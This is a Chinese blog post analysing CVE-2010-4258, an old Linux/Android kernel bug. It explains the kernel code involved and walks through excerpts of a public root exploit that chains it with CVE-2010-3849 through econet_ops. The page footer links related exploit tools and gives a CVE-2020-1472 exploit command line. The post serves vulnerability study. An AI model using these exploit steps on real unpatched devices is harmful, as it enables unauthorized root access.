Root exploit for Android and Linux(CVE-2010-4258)

最新推荐文章于 2023-03-21 15:01:36 发布
最新推荐文章于 2023-03-21 15:01:36 发布
阅读量3.6k 收藏
点赞数 1
分类专栏: Android安全 文章标签: Root exploit CVE-2010-4258 Android Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hu3167343/article/details/36892563
版权

/*

本文章由 莫灰灰 编写,转载请注明出处。  

作者:莫灰灰    邮箱: minzhenfei@163.com

*/

一. 漏洞简介

CVE-2010-4258这个漏洞很有意思,主要思路是如果通过clone函数去创建进程,并且带有CLONE_CHILD_CLEARTID标志,那么进程在退出的时候,可以造成内核任意地址写0的bug。PoC代码利用了多个漏洞来达到权限提升的目的。


二. 前置知识 (进程创建、退出)

1.当fork或者clone一个进程在的时候, copy_process执行如下操作:

static struct task_struct *copy_process(unsigned long clone_flags,
                                        unsigned long stack_start,
                                        struct pt_regs *regs,
                                        unsigned long stack_size,
                                        int __user *child_tidptr,
                                        struct pid *pid,
                                        int trace)
{
        p->set_child_tid = (clone_flags & CLONE_CHILD_SETTID) ? child_tidptr : NULL;
        /*
         * Clear TID on mm_release()
         */
        p->clear_child_tid = (clone_flags & CLONE_CHILD_CLEARTID) ? child_tidptr: NULL;
}
如果clone的flag带有CLONE_CHILD_CLEARTID标志,那么clear_child_tid指针中就会保存应用层传递进来的child_tidptr的地址。


2.应用层调用clone函数,并传递CLONE_CHILD_CLEARTID标志,则child_tidptr指针就会被赋值给子进程的clear_child_tid

clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, child_tidptr);


3.进程在退出的时候调用do_exit清理资源,调用路径如下:do_exit->exit_mm->mm_release 

/*
* If we're exiting normally, clear a user-space tid field if
* requested.  We leave this alone when dying by signal, to leave
* the value intact in a core dump, and to save the unnecessary
* trouble, say, a killed vfork parent shouldn't touch this mm.
* Userland only wants this done for a sys_exit.
*/
if (tsk->clear_child_tid) {
	if (!(tsk->flags & PF_SIGNALED) &&
	    atomic_read(&mm->mm_users) > 1) {
		/*
		 * We don't check the error code - if userspace has
		 * not set up a proper pointer then tough luck.
		 */
		put_user(0, tsk->clear_child_tid);
		sys_futex(tsk->clear_child_tid, FUTEX_WAKE,
				1, NULL, NULL, 0);
	}
	tsk->clear_child_tid = NULL;
}
上述代码中,如果tsk->clear_child_tid不为空,那么其会调用put_user(0, tsk->clear_child_tid);


4.put_user其实是一个宏,具体是__put_user_check函数,它会将tsk->clear_child_tid的值置为0

#define __put_user_check(x,ptr,size)				\
({								\
	long __pu_err = -EFAULT;				\
	__typeof__(*(ptr)) __user *__pu_addr = (ptr);		\
	__typeof__(*(ptr)) __pu_val = x;			\
	if (likely(access_ok(VERIFY_WRITE, __pu_addr, size)))	\
		__put_user_size(__pu_val, __pu_addr, (size),	\
				__pu_err);			\
	__pu_err;						\
})
__put_user_check函数会调用access_ok去检查传进来的参数是否合法 

#define access_ok(type,addr,size)	_access_ok((unsigned long)(addr),(size))

int _access_ok(unsigned long addr, unsigned long size)
{
	if (!size)
		return 1;

	if (!addr || addr > (0xffffffffUL - (size - 1)))
		goto _bad_access;

	if (segment_eq(get_fs(), KERNEL_DS))
		return 1;

	if (memory_start <= addr && (addr + size - 1) < memory_end)
		return 1;

_bad_access:
	pr_debug("Bad access attempt: pid[%d] addr[%08lx] size[0x%lx]\n",
		 current->pid, addr, size);
	return 0;
}
access_ok也是一个宏,具体函数为_access_ok,其主要对外部传进来的addr和size参数做合法性检查,其中关键调用语句如下

if (segment_eq(get_fs(), KERNEL_DS))
return 1;

# define get_fs() (current_thread_info()->addr_limit)

如果get_fs() = KERNEL_DS,那么_access_ok检查始终返回1.


三. 前置知识(无效地址访问异常)

每当我们访问一个无效地址的时候,系统便会执行do_page_fault去生成异常日志,结束异常进程等。

int do_page_fault(struct pt_regs *regs, unsigned long address,
		  unsigned int write_access, unsigned int trapno)
{
	// ......
	die("Oops", regs, (write_access << 15) | trapno, address);
	do_exit(SIGKILL);
}
而往往一些内核bug产生的时候就满足get_fs() = KERNEL_DS这个条件,这个很关键。


接下来看看CVE-2010-3849这个漏洞,它主要是一个0地址访问异常漏洞,msg->msg_name可以由用户空间控制,因此可以是个NULL值。接下来的saddr->cookie;这句调用就会造成0地址访问异常。

static int econet_sendmsg(struct kiocb *iocb, struct socket *sock,
                          struct msghdr *msg, size_t len)
{       
      struct sock *sk = sock->sk;
      struct sockaddr_ec *saddr=(struct sockaddr_ec *)msg->msg_name;
                
      eb->cookie = saddr->cookie;
}


四. 漏洞利用

1.获取需要用到的函数地址

 /* Resolve addresses of relevant symbols */
 printf("[*] Resolving kernel addresses...\n");
 econet_ioctl = get_kernel_sym("econet_ioctl");
 econet_ops = get_kernel_sym("econet_ops");
 commit_creds = (_commit_creds) get_kernel_sym("commit_creds");
 prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

2.申请一块新进程的栈空间 

if(!(newstack = malloc(65536))) {
                printf("[*] Failed to allocate memory.\n");
                return -1;
        }

3.处理好需要映射的地址,比较关键 

// econet_ops中保存了各个econet函数的地址指针,
// 10 * sizeof(void *)到达econet_ioctl的下一个函数地址
// 再-1,那么清零的时候是清掉了econet_ioctl下个函数地址的高24字节和econet_ioctl函数的高8字节
target = econet_ops + 10 * sizeof(void *) - OFFSET;
 
// 清掉econet_ioctl函数的高8字节
landing = econet_ioctl << SHIFT >> SHIFT;

// landing按页对齐,map了2个页的内存
payload = mmap((void *)(landing & ~0xfff), 2 * 4096,
                       PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);
 
if ((long)payload == -1) {
           rintf("[*] Failed to mmap() at target address.\n");
           return -1;
}

// 将提权代码拷贝到landing
memcpy((void *)landing, &trampoline, 1024);
ps.这里要说明一下,这里为什么要把地址映射到(econet_ioctl&0x00FFFFFF)地址范围内,而不是直接将econet_ops指针数组中的econet_ioctl函数地址清零呢。那是因为新版本的linux不允许用户直接调用mmap函数映射0地址了,所以采用了一个很巧妙的小技巧。

可以调用查看下系统最低映射的地址,我这里是65536


4.clone进程

// trigger用来触发CVE-2010-3849漏洞,是一个0地址访问异常
int trigger(int * fildes)
{
        int ret;
        struct ifreq ifr;
 
        memset(&ifr, 0, sizeof(ifr));
        strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);
 
        ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
 
        if(ret < 0) {
                printf("[*] Failed to set Econet address.\n");
                return -1;
        }
 
        splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
        splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
 
        /* Shouldn't get here... */
        exit(0);
}

// clone进程,子进程调用trigger触发0地址访问的漏洞,进而将target指向的地址清0
// 即清掉了econet_ioctl函数地址的高8字节
clone((int (*)(void *))trigger,
              (void *)((unsigned long)newstack + 65536),
              CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
              &fildes, NULL, NULL, target);

5.最后ioctl函数触发底层的econet_ioctl函数执行,而econet_ioctl函数的高8字节已经被我们清零了,所以会调用到我们的map地址中,进而触发提权代码获得root权限 

sleep(1);
printf("[*] Triggering payload...\n");
ioctl(fildes[2], 0, NULL);


参考文章:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4258

http://www.exploit-db.com/exploits/15704/

http://hi.baidu.com/wzt85/item/2467d70f893700133a53eed9








莫灰灰
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
UNIX环境高级编程-进程间通讯
hixiaoxiaoniao的专栏
09-15 313
进程间通讯
linux 启动线程命令,Linux 线程分析
weixin_33092503的博客
04-29 643
用户态线程用户空间利用系统调用clone来创建线程,在glibc中文件夹nptl/sysdeps/pthreadcreatethread.c中的函数create_thread中指明了flags:...int clone_flags = (CLONE_VM | CLONE_FS | CLONE_FILES | CLONE_SIGNAL |CLONE_SETTLS | CLONE_PARENT_SET...
拼了!第一次花这么长时间只为了给你们解释清楚 线程与栈!
weixin_48655626的博客
11-27 352
这篇文章是介绍一下线程与栈相关的话题,文章比较长,主要会聊聊下面这些话题: 进程与线程的本质区别,线程与内存共享 Linux pthread 与 Guard 区域 Hotspot 线程栈的 Guard 区域实现原理 你可能没有怎么听说过的 Yellow-Zone、Red-Zone Java StackOverflowError 的实现原理 为了讲清楚线程与栈的关系,我们要从进程和线程之间的关系讲起,接下来开始第一部分。 开始之前,记得点赞收藏加关注哦 ,需要下载PDF版本和获取更多知识点、面试题的朋友可
weblogic目录总结以及getshell
qq_45300786的博客
08-24 2007
之前都是工具一键getshell,没有仔细研究weblogic,这次手动payload的时候,遇到点问题,就稍微研究了一下。 发现访问目标是war包+文件名 http://192.168.100.80:7001/wls-wsat/test.jsp 但是上传的时候却是war包+随机生成的目录值+war+文件名 wls-wsat/54p17w/war/test.jsp 以下是楼主分析 结论一 结论二 ...
linux内核设计与实现---进程管理
qq_41683305的博客
03-17 997
进程管理1 进程描述符及任务结构分配进程描述符进程描述符的存放进程状态设置当前进程状态进程上下文进程家族树2 进程创建写时拷贝fork()vfork()3 线程在Linux中的实现4 进程终结删除进程描述符孤儿进程造成的进退微谷5 小结 1 进程描述符及任务结构 分配进程描述符 进程描述符的存放 进程状态 设置当前进程状态 进程上下文 进程家族树 2 进程创建 写时拷贝 fork() vfork() 3 线程在Linux中的实现 4 进程终结 删除进程描述符 孤儿进程造成的进退微谷 5 小结 ...
CVE-2019-0708-ExpLoit.zip
05-15
CVE-2019-0708-exploit,针对远程桌面服务(以前称为终端服务)的关键远程执行代码漏洞CVE-2019-0708,以下是Windows版利用工具,以及python版利用工具
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)
05-31
针对 CVE-2018-15133 的 Laravel 漏洞利用此代码利用 ,它基于和对该漏洞。 我几乎只是为一个盒子做了这个,因为我现在不想使用 Metasploit,也不想作为练习 Python 的借口。 来自 CVE 的描述: 在 Laravel ...
CVE-2017-8759-Exploit-sample:运行CVE-2017-8759利用示例
04-23
CVE-2017-8759-漏洞利用示例 运行CVE-2017-8759漏洞利用示例。 漏洞利用流程: Word宏在Doc1.doc文件中运行。 宏通过wsdl下载格式错误的txt文件,从而触发WSDL分析器日志。 然后,分析日志将导致运行mshta.exe,这...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
K8 weblogic-CVE-2018-2628-getshell
05-08
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
Weblogic Unserialization GetShll&CMD;
03-27
安全渗透中使用,对weblogic中序列化漏洞的测试,可以对weblogic中执行cmd命令,直接获取服务器信息,此工具可以测试漏洞
weblogic 序列化漏洞测试及破解方式
11-30
CommonsCollectionsTools.jar weblogic 序列化 漏洞测试 破解方式
android-exploit-
05-27
Android漏洞利用 android漏洞收集和android开发指南 OWASP十大移动风险 不安全的数据存储 弱服务器端控件 传输层保护不足 客户端注入 授权和认证不佳 会话处理不当 通过不受信任的输入进行安全决策 侧通道数据泄漏 破碎的密码学 敏感信息披露 常用工具 SSH协议 VNC服务器 编译器(gcc / agcc) Android SDK(adb!) XCode 越狱的iDevice 根植的Android设备 Android骇客工具 行动应用程式(Android专用) -Android远程管理工具 枚举本地主机,发现漏洞及其漏洞,破解Wi-Fi密码,安装后门的工具blablabla! 合一Android Pentest工具 网络映射,端口发现,嗅探,数据包处理,DoS,MITM等等! 社交媒体数据包的拦截和嗅探WiFi网络流量 -Android应用程序,可分
java反序列化漏洞利用工具WebLogicExploit
01-14
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
模拟入侵android手机
边缘拼命划水的小陈
03-21 1746
1、android手机虚拟机2、kali系统。
linux创建进程块,linux进程的创建、退出、调度
weixin_32719533的博客
04-28 273
一、进程的创建1、task_struct相关成员。struct task_struct{//进程的当前状态。volatile long state;//大内核锁int lock_depth;//prio:进程的动态优先级。//static_prio:进程的静态优先级。int prio, static_prio;//进程所属的运行队列。struct list_head run_list;//进程所属...
Weblogic管理控制台Getshell
weixin_43899495的博客
02-02 786
影响范围 能访问并登录weblogic管理控制台即可: http://ip:7001/console 获取控制台口令 弱口令 weblogic weblogic system password guest guest portaladmin portaladmin admin security joe password mary password system security wlcsystem wlcs
Root exploit for Android (adb setuid)
莫灰灰的专栏
07-02 4459
/* 本文章由 莫灰灰 编写,转载请注明出处。   作者:莫灰灰    邮箱: [email protected] */ 1. 漏洞分析 这是个很老的漏洞了,主要利用adb启动的时候调用setuid函数降到shell权限,却没有判断setuid返回失败的情况,因此造成了root的可能 如下是已经修复漏洞后的代码: 原本的代码大致如下: setgid(A
CVE-2020-1472
最新发布
08-30
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值